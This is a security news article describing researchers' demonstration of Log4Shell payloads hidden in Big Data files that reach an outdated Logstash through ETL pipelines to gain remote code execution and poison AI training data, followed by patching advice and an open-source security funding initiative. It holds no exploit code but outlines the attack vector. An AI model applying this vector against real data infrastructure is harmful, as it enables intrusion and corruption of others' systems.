The Apache Log4j Log4Shell bug is one of the most critical vulnerabilities in the history of cybersecurity.
Hundreds of millions of devices use the Log4j component for various online services, among them government organizations, critical infrastructure, companies and individuals.
Actually, pretty much all software uses this library written in Java, so it’s a very widespread risk and concern. That’s also why hackers have been exploiting the bug actively since it became public last year, sometimes using public POCs (proofs of concept), which can be all too easily found on GitHub, and the exploit is notoriously easy to use.
Zectonal researchers have revealed a new and critically important attack vector that can use the infamous bug: Data pipelines and data lakes. The researchers demonstrate how hackers could poison AI and machine learning to bypass detection.
The infected payload could be injected in Big Data files used to train AI. According to the researchers, such an attack is pretty hard to anticipate and catch. They tried to use the most realistic processes and cloud architectures to demonstrate the severity of the threat.
The intent of the exploit is to poison the targeted AI models and associated analytics, making the whole data infrastructure ineffective. By introducing malicious payloads in the global data supply chain, hackers could inflict crippling damage on their victims.
Also read: Top Code Debugging and Code Security Tools
Understanding the Big Data Attack
No-code data pipelines used in the research are particularly attractive for an attacker, as “the data flow never transits through any type of firewall or scanning device before it is processed and ultimately gains access to a vulnerable system.”
The researchers deliberately used common cloud-based architecture, storage systems (e.g., buckets), and ETL (extract, transform, load) applications. They also applied standard configurations and files, and hid their payload (the crafted string used to exploit the Log4Shell bug) into a single data point among the millions available:
The ETL process combines data from multiple sources into a single data pool. ETL applications are essential for data analytics and machine learning workstreams, as they clean and organize the data according to specific rules that meet the business intelligence needs.
The researchers managed to “gain immediate remote code execution from within a private virtual cloud over the public Internet.” More precisely, they gained remote access to a no-code ETL software service with private subnet IP addresses that was part of a VPC (virtual private cloud) hosted by a public cloud provider.
Such an exploit will likely inspire other attacks, as AI is used to power many advanced needs and services. Critical systems like smart vehicles, healthcare, finance and supply chains are and can be automated thanks to deep learning.
Enterprises already use AI to identify patterns and trends in customer analytics to identify business opportunities. Flaws that allow such an evasive strategy access to data lakes must be addressed quickly.
To exploit the Log4Shell vulnerability, the researchers attacked the Logstash component of the ELK stack (Elasticsearch, Logstash, and Kibana), a very popular open-source log management system that boasts millions of downloads.
Such platforms are widely used by enterprises to extract and analyze data. While the latest versions have fixed the Log4Shell vulnerability, the researchers were able to exploit versions released immediately before the disclosure of Log4Shell in combination with Java 8.
The researchers leveraged a classic combination of vectors in enterprises: multiple outdated components that ultimately lead to disaster.
Also read: Top Vulnerability Management Tools
Prevent AI and Open Source Exploits
The researchers cited the Synk JVM Ecosystem Report 2021 that found that “60% of Java developers still use Java 8 in production.” Indeed, lots of corporate systems use outdated libraries, putting whole organizations at high risk.
While aggressive patch management can add significant costs and operational complexity, users and administrators need to be aware of their hardware and software that are vulnerable or need to be retired. Attackers now have access to an extensive range of advanced hacking tools that can map vulnerabilities and provide pre-configured payloads to exploit them.
The software supply chain is prone to attacks, and the open-source Log4j library is a striking example. In fact, open source is increasingly a part of enterprise applications and development efforts, and securing the various associated ecosystems will not be free or easy. The dependencies are mind-boggling.
It might seem like a costly undertaking to secure all that, but the cost of successful cyberattacks is much higher – and in some cases putting organizations out of business.
The Open Source Security Foundation (OpenSSF), a leading open-source organization associated with the Linux Foundation, recently announced “an ambitious, multipronged plan with 10 key goals to better secure the entire open-source software ecosystem.” The price tag for the program is $150 million, more than $30 million of which has already been pledged by tech giants like Amazon, Ericsson, Google, Intel, Microsoft and VMWare.
The plan could support developers so they can fix issues, including training, provide security audits, and encourage the use of authenticated package signing for the distribution of software components. The initiative will likely benefit many actors in the software supply chain, including public sectors.
While this is not the first time the Linux Foundation has tried to help secure the open-source world, the current state of the software supply chain is finally broken to the point that key leaders are willing to do something; hopefully it’s not broken beyond the point of no return.
Whether it’s developers who self-sabotage their component because of lack of financial support, malicious contributors who inject backdoors in popular open-source libraries, or maintainers who introduce critical bugs by accident, dependency management can be a nightmare.
In addition to these threats, many dependencies use existing components to speed up development, adding an extra layer of complexity that makes the whole mess even more difficult for companies to manage.